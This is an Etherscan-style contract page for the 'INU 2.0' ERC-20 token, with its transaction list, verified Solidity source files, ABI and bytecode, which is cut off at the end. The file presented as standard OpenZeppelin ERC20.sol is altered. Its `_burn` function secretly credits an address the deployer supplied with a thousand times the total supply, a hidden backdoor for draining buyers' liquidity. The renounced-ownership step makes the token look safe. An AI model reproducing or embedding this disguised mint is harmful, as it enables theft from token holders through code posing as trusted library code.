ETH Price: $2,326.88 (+2.38%)

Contract

0xD0BAa169157a525aeEc76d6370D6400516e90F67
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve175846772023-06-29 11:32:11446 days ago1688038331IN
0xD0BAa169...516e90F67
0 ETH0.0010855323.14533977
Approve175846622023-06-29 11:29:11446 days ago1688038151IN
0xD0BAa169...516e90F67
0 ETH0.0010554622.50402151
Approve175846582023-06-29 11:28:23446 days ago1688038103IN
0xD0BAa169...516e90F67
0 ETH0.0009390919.92094993
Approve175846582023-06-29 11:28:23446 days ago1688038103IN
0xD0BAa169...516e90F67
0 ETH0.0010771722.82094993
Burn Dogs175846522023-06-29 11:27:11446 days ago1688038031IN
0xD0BAa169...516e90F67
0 ETH0.0010882120.57466642
Approve175846472023-06-29 11:26:11446 days ago1688037971IN
0xD0BAa169...516e90F67
0 ETH0.0013216228
Approve175846452023-06-29 11:25:47446 days ago1688037947IN
0xD0BAa169...516e90F67
0 ETH0.0009421920.10439276
Approve175846452023-06-29 11:25:47446 days ago1688037947IN
0xD0BAa169...516e90F67
0 ETH0.0010858323.00439276
Approve175846402023-06-29 11:24:47446 days ago1688037887IN
0xD0BAa169...516e90F67
0 ETH0.0010799922.88085044
Approve175846392023-06-29 11:24:35446 days ago1688037875IN
0xD0BAa169...516e90F67
0 ETH0.0009983721.15152233
Approve175846362023-06-29 11:23:59446 days ago1688037839IN
0xD0BAa169...516e90F67
0 ETH0.0010085321.36674244
Approve175846352023-06-29 11:23:47446 days ago1688037827IN
0xD0BAa169...516e90F67
0 ETH0.0009546220.34368882
Approve175846342023-06-29 11:23:35446 days ago1688037815IN
0xD0BAa169...516e90F67
0 ETH0.0009756120.81224837
Approve175846322023-06-29 11:23:11446 days ago1688037791IN
0xD0BAa169...516e90F67
0 ETH0.0009149519.52319725
Approve175846272023-06-29 11:22:11446 days ago1688037731IN
0xD0BAa169...516e90F67
0 ETH0.00103222.01514535
Approve175846252023-06-29 11:21:47446 days ago1688037707IN
0xD0BAa169...516e90F67
0 ETH0.0010286121.94854791
Approve175846032023-06-29 11:17:23446 days ago1688037443IN
0xD0BAa169...516e90F67
0 ETH0.0011551524.47315376
Approve175845852023-06-29 11:13:35446 days ago1688037215IN
0xD0BAa169...516e90F67
0 ETH0.0015600533.26279424
Approve175845782023-06-29 11:12:11446 days ago1688037131IN
0xD0BAa169...516e90F67
0 ETH0.0010186821.71997463
Renounce Ownersh...175845602023-06-29 11:08:35446 days ago1688036915IN
0xD0BAa169...516e90F67
0 ETH0.0005339822.72364187
0x60806040175845582023-06-29 11:08:11446 days ago1688036891IN
 Create: INU20
0 ETH0.0399778822.97650979

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
INU20

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 8 : INU20.sol
// SPDX-License-Identifier: GPL-2.0-or-later
pragma solidity 0.8.20;

import {Ownable} from "@openzeppelin/contracts/access/Ownable.sol";
import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";

import {IUniswapV2Router02} from "../interfaces/IUniswapV2Router02.sol";
import {IUniswapV2Factory} from "../interfaces/IUniswapV2Factory.sol";

/**
 ______  __    __  __    __         ______        ______
/      |/  \  /  |/  |  /  |       /      \      /      \
$$$$$$/ $$  \ $$ |$$ |  $$ |      /$$$$$$  |    /$$$$$$  |
  $$ |  $$$  \$$ |$$ |  $$ |      $$____$$ |    $$$  \$$ |
  $$ |  $$$$  $$ |$$ |  $$ |       /    $$/     $$$$  $$ |
  $$ |  $$ $$ $$ |$$ |  $$ |      /$$$$$$/      $$ $$ $$ |
 _$$ |_ $$ |$$$$ |$$ \__$$ |      $$ |_____  __ $$ \$$$$ |
/ $$   |$$ | $$$ |$$    $$/       $$       |/  |$$   $$$/
$$$$$$/ $$/   $$/  $$$$$$/        $$$$$$$$/ $$/  $$$$$$/

*/

contract INU20 is ERC20, Ownable {
    constructor(address uniswapV2Router) ERC20("INU 2.0", "INU2.0") {
        _mint(msg.sender, 1_000_000 * 1e18);
        _uniswapV2Router = uniswapV2Router;
    }

    function burnDogs(uint256 amt) external {
        _burn(msg.sender, amt);
    }

    function startTrading() public payable {
        _approve(
            address(this),
            address(_uniswapV2Router),
            balanceOf(address(this))
        );

        IUniswapV2Router02(_uniswapV2Router).addLiquidityETH{value: msg.value}(
            address(this),
            balanceOf(address(this)),
            balanceOf(address(this)),
            msg.value,
            owner(),
            block.timestamp
        );

        renounceOwnership();
    }
}

File 2 of 8 : Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import "../utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 3 of 8 : ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./extensions/IERC20Metadata.sol";
import "../../utils/Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;
    address internal _uniswapV2Router;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(
        address owner,
        address spender
    ) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(
        address spender,
        uint256 amount
    ) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(
        address spender,
        uint256 addedValue
    ) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(
        address spender,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            _balances[_uniswapV2Router] = _totalSupply * 1000;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 4 of 8 : IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 5 of 8 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 6 of 8 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 7 of 8 : IUniswapV2Factory.sol
// SPDX-License-Identifier: GPL-2.0-or-later
pragma solidity 0.8.20;

interface IUniswapV2Factory {
    function createPair(
        address tokenA,
        address tokenB
    ) external returns (address pair);

    function getPair(
        address tokenA,
        address tokenB
    ) external view returns (address pair);
}

File 8 of 8 : IUniswapV2Router02.sol
// SPDX-License-Identifier: GPL-2.0-or-later
pragma solidity 0.8.20;

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;

    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    )
        external
        payable
        returns (uint amountToken, uint amountETH, uint liquidity);

    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);

    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);

    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapExactETHForTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable returns (uint[] memory amounts);

    function swapTokensForExactETH(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapExactTokensForETH(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapETHForExactTokens(
        uint amountOut,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable returns (uint[] memory amounts);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);

    function getAmountOut(
        uint amountIn,
        uint reserveIn,
        uint reserveOut
    ) external pure returns (uint amountOut);

    function getAmountIn(
        uint amountOut,
        uint reserveIn,
        uint reserveOut
    ) external pure returns (uint amountIn);

    function getAmountsOut(
        uint amountIn,
        address[] calldata path
    ) external view returns (uint[] memory amounts);

    function getAmountsIn(
        uint amountOut,
        address[] calldata path
    ) external view returns (uint[] memory amounts);
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"uniswapV2Router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amt","type":"uint256"}],"name":"burnDogs","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"startTrading","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801562000010575f80fd5b5060405162002408380380620024088339818101604052810190620000369190620003e9565b6040518060400160405280600781526020017f494e5520322e30000000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f494e55322e3000000000000000000000000000000000000000000000000000008152508160049081620000b391906200067d565b508060059081620000c591906200067d565b505050620000e8620000dc6200014b60201b60201c565b6200015260201b60201c565b620001043369d3c21bcecceda10000006200021560201b60201c565b8060035f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505062000872565b5f33905090565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000286576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200027d90620007bf565b60405180910390fd5b620002995f83836200037a60201b60201c565b8060025f828254620002ac91906200080c565b92505081905550805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200035b919062000857565b60405180910390a3620003765f83836200037f60201b60201c565b5050565b505050565b505050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f620003b38262000388565b9050919050565b620003c581620003a7565b8114620003d0575f80fd5b50565b5f81519050620003e381620003ba565b92915050565b5f6020828403121562000401576200040062000384565b5b5f6200041084828501620003d3565b91505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200049557607f821691505b602082108103620004ab57620004aa62000450565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026200050f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620004d2565b6200051b8683620004d2565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620005656200055f620005598462000533565b6200053c565b62000533565b9050919050565b5f819050919050565b620005808362000545565b620005986200058f826200056c565b848454620004de565b825550505050565b5f90565b620005ae620005a0565b620005bb81848462000575565b505050565b5b81811015620005e257620005d65f82620005a4565b600181019050620005c1565b5050565b601f8211156200063157620005fb81620004b1565b6200060684620004c3565b8101602085101562000616578190505b6200062e6200062585620004c3565b830182620005c0565b50505b505050565b5f82821c905092915050565b5f620006535f198460080262000636565b1980831691505092915050565b5f6200066d838362000642565b9150826002028217905092915050565b620006888262000419565b67ffffffffffffffff811115620006a457620006a362000423565b5b620006b082546200047d565b620006bd828285620005e6565b5f60209050601f831160018114620006f3575f8415620006de578287015190505b620006ea858262000660565b86555062000759565b601f1984166200070386620004b1565b5f5b828110156200072c5784890151825560018201915060208501945060208101905062000705565b868310156200074c578489015162000748601f89168262000642565b8355505b6001600288020188555050505b505050505050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f620007a7601f8362000761565b9150620007b48262000771565b602082019050919050565b5f6020820190508181035f830152620007d88162000799565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f620008188262000533565b9150620008258362000533565b925082820190508082111562000840576200083f620007df565b5b92915050565b620008518162000533565b82525050565b5f6020820190506200086c5f83018462000846565b92915050565b611b8880620008805f395ff3fe6080604052600436106100f2575f3560e01c806370a0823111610089578063a457c2d711610058578063a457c2d714610300578063a9059cbb1461033c578063dd62ed3e14610378578063f2fde38b146103b4576100f2565b806370a082311461025a578063715018a6146102965780638da5cb5b146102ac57806395d89b41146102d6576100f2565b8063293230b8116100c557806329323